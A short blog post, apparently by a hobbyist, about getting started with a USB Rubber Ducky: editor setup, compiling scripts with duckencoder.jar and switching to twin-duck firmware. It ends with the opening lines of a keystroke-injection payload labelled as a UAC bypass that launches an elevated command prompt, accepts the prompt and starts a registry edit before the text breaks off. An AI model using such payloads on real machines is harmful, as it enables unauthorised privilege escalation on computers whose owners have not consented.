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Showing posts with the label General

General -Rubber Ducky

RubberDUcky So I just got a rubber ducky and have been playing around with it Here is some of my first couple of days 1st thing I did was import the lanugauge in Notepad++ to write my scripts in you can find the xml file here ( ) I also set a custom console to compile the scripts using the duckencoder.jar CD: C:\users\********\Desktop\Ducky Current directory: C:\users\******\Desktop\Ducky java -jar duckencoder.jar -i ipconfig -o inject.bin I also changed the firmware to twin ducky so I can read/write to the SD card while running payload My first little scrip I borrowed a bit from some other posts but i'm still not entirely happy with it  REM *** UAC Bypass *** DELAY 3000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 500 ALT y DELAY 200 STRING reg add HKCU\So...